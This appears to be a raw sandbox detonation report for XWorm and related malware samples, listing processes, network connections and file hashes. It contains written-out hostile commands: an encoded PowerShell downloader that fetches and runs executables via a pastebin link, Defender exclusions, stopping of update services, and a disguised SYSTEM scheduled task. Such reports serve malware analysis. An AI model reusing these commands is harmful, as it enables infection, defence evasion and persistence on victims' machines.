| C:\Windows\system32\WerFault.exe | C:\Windows\system32\WerFault.exe -u -p 3724 -s 2332 |
| C:\Windows\System32\schtasks.exe | "C:\Windows\System32\schtasks.exe" /create /f /sc ONLOGON /RL HIGHEST /tn "wsappx" /tr "C:\Users\Static\wsappx.exe" |
| C:\Windows\System32\Conhost.exe | \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
| C:\Windows\system32\taskmgr.exe | "C:\Windows\system32\taskmgr.exe" /4 |
| C:\Windows\system32\WerFault.exe | C:\Windows\system32\WerFault.exe -pss -s 484 -p 2576 -ip 2576 |
| C:\Windows\system32\WerFault.exe | C:\Windows\system32\WerFault.exe -u -p 2576 -s 2420 |
| C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV |
| C:\Windows\system32\wbem\WmiApSrv.exe | C:\Windows\system32\wbem\WmiApSrv.exe |
| C:\Users\Admin\Desktop\builder.exe | "C:\Users\Admin\Desktop\builder.exe" |
| C:\Users\Admin\Desktop\XHVNC.exe | "C:\Users\Admin\Desktop\XHVNC.exe" |
| C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\qypivi1f\qypivi1f.cmdline" |
| C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7B37.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcF87B34828AF45FD95422731E385FB80.TMP" |
| C:\Users\Admin\Desktop\XWorm.exe | "C:\Users\Admin\Desktop\XWorm.exe" |
| C:\Windows\system32\taskmgr.exe | "C:\Windows\system32\taskmgr.exe" /4 |
| C:\Windows\system32\AUDIODG.EXE | C:\Windows\system32\AUDIODG.EXE 0x2f8 0x2f4 |
| C:\Windows\SYSTEM32\taskkill.exe | taskkill /F /IM explorer.exe |
| C:\Windows\explorer.exe | "C:\Windows\explorer.exe" |
| C:\Windows\explorer.exe | "C:\Windows\explorer.exe" |
| C:\Windows\System32\rundll32.exe | C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {9BA05972-F6A8-11CF-A442-00A0C90A8F39} -Embedding |
| C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca |
| C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe | "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca |
| C:\Windows\system32\WerFault.exe | C:\Windows\system32\WerFault.exe -pss -s 464 -p 2920 -ip 2920 |
| C:\Windows\system32\WerFault.exe | C:\Windows\system32\WerFault.exe -u -p 2920 -s 7812 |
| C:\Windows\explorer.exe | explorer.exe |
| C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe | "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca |
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 184 -p 3848 -ip 3848
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3848 -s 4116
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 536 -p 2100 -ip 2100
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 2100 -s 3548
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 488 -p 3596 -ip 3596
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3596 -s 3528
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 536 -p 772 -ip 772
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 772 -s 3548
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 488 -p 3568 -ip 3568
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3568 -s 3548
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 532 -p 2868 -ip 2868
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3036 --field-trial-handle=1832,i,13986470051571676830,6581187266039512081,131072 /prefetch:8
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 2868 -s 3576
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6140 --field-trial-handle=1832,i,13986470051571676830,6581187266039512081,131072 /prefetch:8
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Desktop\New folder\" -an -ai#7zMap19790:98:7zEvent20048
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Users\Admin\Desktop\New folder\XWorm V3.1.exe
"C:\Users\Admin\Desktop\New folder\XWorm V3.1.exe"
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
C:\Users\Admin\Desktop\AtlsWare.exe
"C:\Users\Admin\Desktop\AtlsWare.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGsAaQBuACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAbgBoAGsAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAcAB4AGkAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAYQBxAGwAIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcABhAHMAdABlAGIAaQBuAC4AYwBvAG0ALwByAGEAdwAvAHoAYQBDAGcAcgBSADAAMgAnACkALgBTAHAAbABpAHQAKABbAHMAdAByAGkAbgBnAFsAXQBdACIAYAByAGAAbgAiACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AE4AbwBuAGUAKQA7ACAAJABmAG4AIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAUgBhAG4AZABvAG0ARgBpAGwAZQBOAGEAbQBlACgAKQA7ACAAZgBvAHIAIAAoACQAaQA9ADAAOwAgACQAaQAgAC0AbAB0ACAAJABsAG4AawAuAEwAZQBuAGcAdABoADsAIAAkAGkAKwArACkAIAB7ACAAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAbABuAGsAWwAkAGkAXQAsACAAPAAjAHEAZgBjACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAeQB6AHIAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaQB5AGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACgAJABmAG4AIAArACAAJABpAC4AVABvAFMAdAByAGkAbgBnACgAKQAgACsAIAAnAC4AZQB4AGUAJwApACkAKQAgAH0APAAjAHEAZQBxACMAPgA7ACAAZgBvAHIAIAAoACQAaQA9ADAAOwAgACQAaQAgAC0AbAB0ACAAJABsAG4AawAuAEwAZQBuAGcAdABoADsAIAAkAGkAKwArACkAIAB7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHQAaABpACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwB0AGcAYgAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAKAAkAGYAbgAgACsAIAAkAGkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACcALgBlAHgAZQAnACkAKQAgAH0AIAA8ACMAagBjAHUAIwA+AA=="
C:\Users\Admin\AppData\Local\Temp\nefeczio.0j40.exe
"C:\Users\Admin\AppData\Local\Temp\nefeczio.0j40.exe"
C:\Users\Admin\AppData\Local\Temp\nefeczio.0j41.exe
"C:\Users\Admin\AppData\Local\Temp\nefeczio.0j41.exe"
C:\Users\Admin\AppData\Local\Temp\nefeczio.0j42.exe
"C:\Users\Admin\AppData\Local\Temp\nefeczio.0j42.exe"
C:\Users\Admin\AppData\Local\Temp\nefeczio.0j43.exe
"C:\Users\Admin\AppData\Local\Temp\nefeczio.0j43.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
C:\Windows\System32\sc.exe
sc stop UsoSvc
C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\System32\sc.exe
sc stop wuauserv
C:\Windows\System32\sc.exe
sc stop bits
C:\Windows\System32\sc.exe
sc stop dosvc
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\System32\dialer.exe
C:\Windows\System32\dialer.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#fratkkd#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineTCP' /tr '''C:\Program Files\Google\Chrome\updatestarter.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updatestarter.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineTCP' -User 'System' -RunLevel 'Highest' -Force; }
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
C:\Windows\system32\certreq.exe
"C:\Windows\system32\certreq.exe"
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 468 -p 632 -ip 632
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 204 -p 688 -ip 688
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 632 -s 836
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 688 -s 3496
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 464 -p 384 -ip 384
C:\Windows\system32\sihost.exe
sihost.exe
C:\Windows\system32\sihost.exe
sihost.exe
C:\Windows\system32\sihost.exe
sihost.exe
C:\Windows\system32\sihost.exe
sihost.exe
C:\Windows\system32\sihost.exe
sihost.exe
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 472 -p 2736 -ip 2736
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 2736 -s 1584
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 592 -p 3576 -ip 3576
C:\Windows\system32\sihost.exe
sihost.exe
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3576 -s 992
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 536 -p 5020 -ip 5020
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 5020 -s 396
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 472 -p 3048 -ip 3048
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3048 -s 2408
C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineTCP"
C:\Windows\System32\smss.exe
\SystemRoot\System32\smss.exe 000000e4 00000084
C:\Windows\System32\smss.exe
\SystemRoot\System32\smss.exe 00000098 00000084
C:\Windows\System32\smss.exe
\SystemRoot\System32\smss.exe 000000ec 00000084
C:\Windows\System32\smss.exe
\SystemRoot\System32\smss.exe 000000e0 00000084
C:\Windows\System32\smss.exe
\SystemRoot\System32\smss.exe 000000f0 00000084
C:\Windows\System32\smss.exe
\SystemRoot\System32\smss.exe 00000140 00000084
C:\Windows\System32\smss.exe
\SystemRoot\System32\smss.exe 00000104 00000084
C:\Windows\System32\smss.exe
\SystemRoot\System32\smss.exe 00000098 00000084
C:\Windows\System32\smss.exe
\SystemRoot\System32\smss.exe 00000080 00000084
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 2.136.104.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 140.82.113.3:443 | github.com | tcp |
| US | 8.8.8.8:53 | github.githubassets.com | udp |
| US | 8.8.8.8:53 | avatars.githubusercontent.com | udp |
| US | 185.199.108.133:443 | avatars.githubusercontent.com | tcp |
| US | 185.199.111.154:443 | github.githubassets.com | tcp |
| US | 185.199.111.154:443 | github.githubassets.com | tcp |
| US | 185.199.111.154:443 | github.githubassets.com | tcp |
| US | 8.8.8.8:53 | github-cloud.s3.amazonaws.com | udp |
| US | 185.199.111.154:443 | github.githubassets.com | tcp |
| US | 8.8.8.8:53 | 3.113.82.140.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | user-images.githubusercontent.com | udp |
| US | 8.8.8.8:53 | 196.168.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 131.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | crax-pro.webpkgcache.com | udp |
| DE | 172.217.23.193:443 | crax-pro.webpkgcache.com | tcp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 193.23.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 146.78.124.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | apis.google.com | udp |
| DE | 172.217.23.206:443 | apis.google.com | udp |
| US | 8.8.8.8:53 | 206.23.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 130.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | repository-images.githubusercontent.com | udp |
| US | 185.199.108.133:443 | repository-images.githubusercontent.com | tcp |
| US | 185.199.108.133:443 | repository-images.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | content-autofill.googleapis.com | udp |
| NL | 142.250.179.202:443 | content-autofill.googleapis.com | tcp |
| US | 8.8.8.8:53 | 202.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | collector.github.com | udp |
| US | 140.82.114.22:443 | collector.github.com | tcp |
| US | 8.8.8.8:53 | api.github.com | udp |
| US | 140.82.114.5:443 | api.github.com | tcp |
| US | 8.8.8.8:53 | 22.114.82.140.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 5.114.82.140.in-addr.arpa | udp |
| NL | 142.250.179.202:443 | content-autofill.googleapis.com | udp |
| US | 8.8.8.8:53 | codeload.github.com | udp |
| US | 140.82.113.10:443 | codeload.github.com | tcp |
| US | 8.8.8.8:53 | 10.113.82.140.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | camo.githubusercontent.com | udp |
| US | 8.8.8.8:53 | assets.msn.com | udp |
| NL | 88.221.24.59:443 | assets.msn.com | tcp |
| US | 8.8.8.8:53 | 71.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 59.24.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.8.109.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 160.252.72.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | beacons.gcp.gvt2.com | udp |
| US | 192.178.48.227:443 | beacons.gcp.gvt2.com | tcp |
| US | 192.178.48.227:443 | beacons.gcp.gvt2.com | tcp |
| US | 8.8.8.8:53 | 227.48.178.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | 233.129.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | google.com | udp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | 220.167.154.149.in-addr.arpa | udp |
| N/A | 127.0.0.1:7000 | | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| CA | 70.70.70.71:80 | | tcp |
| CA | 70.70.70.71:80 | | tcp |
| CA | 70.70.70.71:80 | | tcp |
| CA | 70.70.70.71:80 | | tcp |
| CA | 70.70.70.71:80 | | tcp |
| CA | 70.70.70.71:80 | | tcp |
| CA | 70.70.70.71:80 | | tcp |
| CA | 70.70.70.71:80 | | tcp |
| CA | 70.70.70.71:80 | | tcp |
| CA | 70.70.70.71:80 | | tcp |
| CA | 70.70.70.71:80 | | tcp |
| CA | 70.70.70.71:80 | | tcp |
| CA | 70.70.70.71:80 | | tcp |
| CA | 70.70.70.71:80 | | tcp |
| CA | 70.70.70.71:80 | | tcp |
| CA | 70.70.70.71:80 | | tcp |
| CA | 70.70.70.71:80 | | tcp |
| CA | 70.70.70.71:80 | | tcp |
| US | 8.8.8.8:53 | 71.70.70.70.in-addr.arpa | udp |
| CA | 70.70.70.71:80 | | tcp |
| CA | 70.70.70.71:80 | | tcp |
| CA | 70.70.70.71:80 | | tcp |
| CA | 70.70.70.71:80 | | tcp |
| CA | 70.70.70.71:80 | | tcp |
| CA | 70.70.70.71:80 | | tcp |
| CA | 70.70.70.71:80 | | tcp |
| CA | 70.70.70.71:80 | | tcp |
| CA | 70.70.70.71:80 | | tcp |
| CA | 70.70.70.71:80 | | tcp |
| CA | 70.70.70.71:80 | | tcp |
| CA | 70.70.70.71:80 | | tcp |
| CA | 70.70.70.71:80 | | tcp |
| CA | 70.70.70.71:80 | | tcp |
| CA | 70.70.70.71:80 | | tcp |
| CA | 70.70.70.71:80 | | tcp |
| CA | 70.70.70.71:80 | | tcp |
| CA | 70.70.70.71:80 | | tcp |
| CA | 70.70.70.71:80 | | tcp |
| CA | 70.70.70.71:80 | | tcp |
| CA | 70.70.70.71:80 | | tcp |
| CA | 70.70.70.71:80 | | tcp |
| CA | 70.70.70.71:80 | | tcp |
| CA | 70.70.70.71:80 | | tcp |
| CA | 70.70.70.71:80 | | tcp |
| CA | 70.70.70.71:80 | | tcp |
| CA | 70.70.70.71:80 | | tcp |
| CA | 70.70.70.71:80 | | tcp |
| CA | 70.70.70.71:80 | | tcp |
| CA | 70.70.70.71:80 | | tcp |
| CA | 70.70.70.71:80 | | tcp |
| CA | 70.70.70.71:80 | | tcp |
| CA | 70.70.70.71:80 | | tcp |
| CA | 70.70.70.71:80 | | tcp |
| CA | 70.70.70.71:80 | | tcp |
| CA | 70.70.70.71:80 | | tcp |
| CA | 70.70.70.71:80 | | tcp |
| CA | 70.70.70.71:80 | | tcp |
| CA | 70.70.70.71:80 | | tcp |
| CA | 70.70.70.71:80 | | tcp |
| CA | 70.70.70.71:80 | | tcp |
| CA | 70.70.70.71:80 | | tcp |
| CA | 70.70.70.71:80 | | tcp |
| CA | 70.70.70.71:80 | | tcp |
| CA | 70.70.70.71:80 | | tcp |
| CA | 70.70.70.71:80 | | tcp |
| CA | 70.70.70.71:80 | | tcp |
| CA | 70.70.70.71:80 | | tcp |
| N/A | 127.0.0.1:7000 | | tcp |
| US | 8.8.8.8:53 | assets.msn.com | udp |
| NL | 2.19.195.194:443 | assets.msn.com | tcp |
| US | 8.8.8.8:53 | 194.195.19.2.in-addr.arpa | udp |
| US | 192.178.48.227:443 | beacons.gcp.gvt2.com | udp |
| NL | 2.19.195.194:443 | assets.msn.com | tcp |
| US | 8.8.8.8:53 | api.github.com | udp |
| US | 140.82.112.6:443 | api.github.com | tcp |
| US | 8.8.8.8:53 | 6.112.82.140.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 140.82.112.4:443 | github.com | tcp |
| US | 8.8.8.8:53 | codeload.github.com | udp |
| US | 140.82.114.9:443 | codeload.github.com | tcp |
| US | 8.8.8.8:53 | 4.112.82.140.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.114.82.140.in-addr.arpa | udp |
| US | 8.8.8.8:53 | beacons.gcp.gvt2.com | udp |
| US | 192.178.48.227:443 | beacons.gcp.gvt2.com | udp |
| N/A | 127.0.0.1:7000 | | tcp |
| N/A | 127.0.0.1:7000 | | tcp |
| N/A | 127.0.0.1:7000 | | tcp |
| N/A | 127.0.0.1:7000 | | tcp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.68.143:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | bitbucket.org | udp |
| US | 104.192.141.1:443 | bitbucket.org | tcp |
| US | 8.8.8.8:53 | 143.68.20.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.141.192.104.in-addr.arpa | udp |
| PL | 195.3.223.214:5130 | | tcp |
Files
\??\pipe\crashpad_3172_OUDKHUIBEEMGJDHT
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 61de52d00605523a79a4cb625f1169d5 |
| SHA1 | ca3976880c7f4c56fb39cfa2e3c5b738893c68c3 |
| SHA256 | 59da30f4ed98904c556d5a702782acade5c747c84bdc84611efcd67900e47eb8 |
| SHA512 | 2e7b9cac57bd4fba5f9523b5ad299ebaff45944f67c8330fb325ec723c2b0a43acf64a860dbcc125e5d4b45d5bca124c86aec19a7ad23d967eae54c5b3babf72 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | f16f3cac73b98ae94ac1bb9149d5f1d7 |
| SHA1 | 0ba4e3b8d26e7552c536c8add2926aaa2f1ba2e3 |
| SHA256 | 839c086d3685195b908b5aa023417dc5f93e38b51864f912ff4b91c8cbb22bb2 |
| SHA512 | 2688a4338f5ab895cab5dcefdfe76b49843785b9ff124c8e2c585f87b1466ac9455cc7fd35d3986404e09c81e586e4a7a5b3062d3757fd419f66d4b501e171f4 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 0cf6474bfa77b98d79050f60239daecc |
| SHA1 | 498725dd04a023750b02ea396165fa7d537d6db6 |
| SHA256 | b537bed7cdc842eda4ed4acfbc75fdc4fd302b5802aef0f2cff5f068a689a7ad |
| SHA512 | 50a999093e8545339ecf5dd1c00a76e8946707ce8a17c45d70b8c759f7bee67ebe74923e41ba023c28214a55b8f74d29682da1122c9a40f79d5205b5828e9fe6 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00000a
| MD5 | 3cf44eff2da9427f46f679875d873147 |
| SHA1 | ab8168e58fdd8db4749cb8c6f6a699c53af1925f |
| SHA256 | abd4b89f9916cb0673d9977dcad128b4456bae2b6036881df996ff0d40442fe3 |
| SHA512 | 03ab548b17892dd2a979bc3425904534ca97d209a67e6eeb4e1455995a60c10d99e09a3621836e9ccf3d512e34d02f2ae7654210e388bb7b7545c72eca87fa81 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000007
| MD5 | c967968a175db49d0658db25241a8dbd |
| SHA1 | 2cc09dc7d0fa17063a119f84c6b91e8031349a31 |
| SHA256 | c662a6b643cb43c5abc464afa5cc9f9484fc77535a0d4ca6c390c04d6dfde083 |
| SHA512 | dabbc31c2b9ab4aab7d24a93c4801b6a4fd5763bda43ca64d69549ec1a27f43a6fe38e4f9ea5a506868a3984d4a95eac170480c9928b8f062b2a3d8c6253c7cd |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000009
| MD5 | 74368ec8b67c68703ea2666435050c84 |
| SHA1 | d33f29626f1923635bc1735cbd0212bcffea75c7 |
| SHA256 | d311a6c56d00b54e99125f07fc7ecc3b1de40d60271991736eb3398f257eb83d |
| SHA512 | 4b3d1ff745f6bc517f15800fad1dc3c285c6a545b9ac16b9fcff069f3ddcbe5a23e0e3a966e9194a3f9d38a35523df29ed6424ff9c243f65b1f90b9705c696e7 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000006
| MD5 | ce5f8af146b2bab234eaf0222bfdba4f |
| SHA1 | 5f3b11ca1261dd50aa83ff056dbdeb858d3cddea |
